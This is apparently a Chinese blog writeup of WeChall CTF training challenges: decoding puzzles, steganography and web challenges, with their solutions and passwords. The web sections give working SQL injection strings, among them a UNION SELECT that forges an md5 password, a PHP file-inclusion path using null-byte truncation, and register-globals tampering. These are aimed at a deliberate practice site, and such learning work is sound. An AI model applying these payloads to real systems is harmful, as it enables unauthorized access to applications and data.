Writeup Web安全 CTF

Wechall WriteUp

 Qiqi's Blog     2018-01-12   7600 words    & views

We Chall WriteUp

本人特别菜,刚刚入门不久,无意中发现了这个国外的网站,感觉题目很有意思,可以学到不少东西,wp持续更新

Prime Factory

直接上python

  1 import math
  2
  3 results = []
  4 def sushu(num):
  5     for i in range(2, num):
  6     ¦   if num % i == 0:
  7     ¦   ¦   return False
  8     return True
  9
 10 def digit_sum(num):
 11     sum = 0
 12     divide = 1000000
 13     while divide > 0:
 14     ¦   sum += num / divide
 15     ¦   num %= divide
 16     ¦   divide /= 10
 17     return sum
 18
 19 cnt = 0
 20 for i in range(1000000, 2000000):
 21     print "trying", i
 22     if sushu(i) and sushu(digit_sum(i)):
 23     ¦   results.append(i)
 24     ¦   cnt += 1
 25     if cnt == 2:
 26     ¦   break
 27
 28 print str(results[0]) + str(results[1])

Training: Get Sourced

查看源代码

拉到最下方,有一行注释<!-- You are looking for this password: html_sourcecode -->

Training: Stegano I

用0xED打开图片,查看16进制码

Crypto - Caesar I

还是用python跑一下,看看哪个长得像答案

  1 #coding:utf-8
  2
  3 s = raw_input('input the ciphertxt:')
  4 for i in range(26):
  5     flag = ''
  6     for j in s:
  7     ¦   if j != ' ':
  8     ¦   ¦   flag += chr((ord(j) - ord('A') + i) % 26 + ord('A'))
  9     ¦   else:
 10     ¦   ¦   flag += ' '
 11     print flag

THE QUICK BROWN FOX JUMPS OVER THE LAZY DOG OF CAESAR AND YOUR UNIQUE SOLUTION IS LESIAGFMGLLG

Training: WWW-Robots

没什么好说的,robots协议,Robots exclusion standard(不了解的可以看一下)

直接访问http://www.wechall.net/robots.txt

获得下一个URLhttp://www.wechall.net/challenge/training/www/robots/T0PS3CR3T

Training: ASCII

这题太直白,直接ASCII码转字符The solution is: sshcbslrspcf

Encodings - URL

同样直白的一道题,URL编码和Unicode编码

解码得到

Yippeh! Your URL is challenge/training/encodings/url/saw_lotion.php?p=rosmidrpmpgl&cid=52#password=fibre_optics Very well done!

或者用python

>>> import urllib
>>> url = '%59%69%70%70%65%68%21%20%59%6F%75%72%20%55%52%4C%20%69%73%20%63%68%61%6C%6C%65%6E%67%65%2F%74%72%61%69%6E%69%6E%67%2F%65%6E%63%6F%64%69%6E%67%73%2F%75%72%6C%2F%73%61%77%5F%6C%6F%74%69%6F%6E%2E%70%68%70%3F%70%3D%73%68%67%73%61%6D%6F%67%6D%73%6C%72%26%63%69%64%3D%35%32%23%70%61%73%73%77%6F%72%64%3D%66%69%62%72%65%5F%6F%70%74%69%63%73%20%56%65%72%79%20%77%65%6C%6C%20%64%6F%6E%65%21'
>>> print urllib.unquote(url)
Yippeh! Your URL is challenge/training/encodings/url/saw_lotion.php?p=shgsamogmslr&cid=52#password=fibre_optics Very well done!

Training: Encodings I

ascii是七位的编码,总共用8个bit存储,最高位恒为0

而本题是7的倍数,所以将其7个一组划分后进行解码

得到This text is 7-bit encoded ascii. Your password is easystarter.

Guesswork

这题居然就是单纯的猜密码,我也是很醉

我一开始猜wechall,发现不对,然后又瞎试了一些,根据错误信息来看,还是wechall更接近,但实在是猜不出黎,于是去看了别人的writeup,发现密码是wechallbot,bot是wechall的身份。。。我表示很无语

No Escape

看一下代码关键处

function noesc_voteup($who)
{
        if ( (stripos($who, 'id') !== false) || (strpos($who, '/') !== false) ) {
                echo GWF_HTML::error('No Escape', 'Please do not mess with the id. It would break the challenge for others', false);
                return;
        }
 
 
        $db = noesc_db();
        $who = GDO::escape($who);
        $query = "UPDATE noescvotes SET `$who`=`$who`+1 WHERE id=1";
        if (false !== $db->queryWrite($query)) {
                echo GWF_HTML::message('No Escape', 'Vote counted for '.GWF_HTML::display($who), false);
        }
        
        noesc_stop100();
}

关键语句

$query = "UPDATE noescvotes SET `$who`=`$who`+1 WHERE id=1";

是一道简单的sql注入题 闭合`号,加#或者—+注释,注意,#需要URL编码(%23) 最终构造的url为

http://www.wechall.net/challenge/no_escape/index.php?vote_for=bill`=111--+

Training: Regex

Level 1

匹配一个空字符串,学习匹配匹配字符串开头结尾的两个符号:/^$/

Level 2

匹配”wechall”,/^wechall$/

Level 3

匹配以wechall或wechall4位文件名,并以.jpg/.gif/.tiff/.bmp/.png为后缀的文件名,/^wechall4?\\.(?:jpg|gif|tiff|bmp|png)$/

Level 4

捕获文件名,/^(wechall4?)\\.(?:jpg|gif|tiff|bmp|png)$/

Training: PHP LFI

这是一道php文件包含漏洞的题,LFI vulnerability

1 $filename = 'pages/'.(isset($_GET["file"])?$_GET["file"]:"welcome").'.html';
2 include $filename;

题目已经给出了关键信息,而参数file也没有任何过滤

直接访问http://www.wechall.net/challenge/training/php/lfi/up/index.php?file=../solution.php

报错信息如下:

PHP Warning(2): include(pages/../solution.php.html): failed to open stream: No such file or directory in www/challenge/training/php/lfi/up/index.php(54) : eval()'d code line 1

提示说找不到../solution.php.html这个文件

所以我们用00截断,过滤掉后面的.html

PHP Warning(2): include(pages/../solution.php): failed to open stream: No such file or directory in www/challenge/training/php/lfi/up/index.php(54) : eval()'d code line 1

依然提示说找不到../solution.php

于是,添加一个目录,访问http://www.wechall.net/challenge/training/php/lfi/up/index.php?file=../../solution.php%00

PHP 0817

这应该算不上文件包含

php中如果switch是数字类型的case的判断时,switch会将其中的参数转换为int类型

所以我们让参数which的值等于solution就好

Training: Crypto - Transposition I

这题一眼就能出来吧,每两个字符颠倒一下顺序

Training: Crypto - Substitution I

替换密码,Substitution cipher

直接上在线工具就好,quipquip

Training: MySQL I

最简单的SQL注入,闭合加注释,让Username等于admin’#即可

Training: MySQL II

看一下源码

        $db = auth2_db();
        
        $password = md5($password);
        
        $query = "SELECT * FROM users WHERE username='$username'";
        
        if (false === ($result = $db->queryFirst($query))) {
                echo GWF_HTML::error('Auth2', $chall->lang('err_unknown'), false);
                return false;
        }
        
        
        #############################
        ### This is the new check ###
        if ($result['password'] !== $password) {
                echo GWF_HTML::error('Auth2', $chall->lang('err_password'), false);
                return false;
        } #  End of the new code  ###
        #############################

是拿Username去获取结果,将获得的password与输入的password的md5值进行比较

这样思路就很明确了,让Username=‘ union select 1, 'admin', 'c4ca4238a0b923820dcc509a6f75849b'# Password=1

其中md5(1) == c4ca4238a0b923820dcc509a6f75849b

成功绕过判断

Training: Register Globals

还是看一下源码

if (isset($login))
{
        echo GWF_HTML::message('Register Globals', $chall->lang('msg_welcome_back', array(htmlspecialchars($login[0]), htmlspecialchars($login[1]))));
        if (strtolower($login[0]) === 'admin') {
                $chall->onChallengeSolved(GWF_Session::getUserID());
        }
}

注意到只需要满足$login[0] == admin就可以了,所以我们在url上加上?login[0]=admin即可

Training: Math Pyramid

这题真的坑,出题人太坏了,故意给出sqrt来误导你,其实这题十分简单,就是a^3/18^.5

Training: LSB

直接上神器Stegsolve,看一下各个通道就能找到答案

Stegano Attachment

链接打开是一张图片,不管先扔到binwalk下看看binwalk attachment.jpg

发现

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
20230         0x4F06          Zip archive data, at least v2.0 to extract, compressed size: 12, uncompressed size: 12, name: solution.txt
20342         0x4F76          End of Zip archive

从偏移量为20230开始,隐藏了一个zip压缩包

分离一下dd if=attachment.jpg of=solution.zip skip=20230 bs=1

打开压缩包,有一个叫solution.txt的文件,打开就是答案

Training: Crypto - Caesar II

0B 33 33 28 20 2E 33 26 70 20 3D 33 39 20 37 33
30 3A 29 28 20 33 32 29 20 31 33 36 29 20 27 2C
25 30 30 29 32 2B 29 20 2D 32 20 3D 33 39 36 20
2E 33 39 36 32 29 3D 72 20 18 2C 2D 37 20 33 32
29 20 3B 25 37 20 2A 25 2D 36 30 3D 20 29 25 37
3D 20 38 33 20 27 36 25 27 2F 72 20 1B 25 37 32
6B 38 20 2D 38 03 20 75 76 7C 20 2F 29 3D 37 20
2D 37 20 25 20 35 39 2D 38 29 20 37 31 25 30 30
20 2F 29 3D 37 34 25 27 29 70 20 37 33 20 2D 38
20 37 2C 33 39 30 28 32 6B 38 20 2C 25 3A 29 20
38 25 2F 29 32 20 3D 33 39 20 38 33 33 20 30 33
32 2B 20 38 33 20 28 29 27 36 3D 34 38 20 38 2C
2D 37 20 31 29 37 37 25 2B 29 72 20 1B 29 30 30
20 28 33 32 29 70 20 3D 33 39 36 20 37 33 30 39
38 2D 33 32 20 2D 37 20 26 36 33 2B 36 36 32 26
36 2A 2A 28 72

16进制转字符后,在ASCII码范围内解密,从中找到长得像答案的

Good\job,\you\solved\one\more\challenge\in\your\journey.\This\one\was\fairly\easy\to\crack.\Wasn't\it?\128\keys\is\a\quite\small\keyspace,\so\it\shouldn't\have\taken\you\too\long\to\decrypt\this\message.\Well\done,\your\solution\is\brogrrnbrffd.

CATALOG
    FEATURED TAGS
    Mac PHP MySQL Writeup Web安全 CTF CSRF Ubuntu
    FRIENDS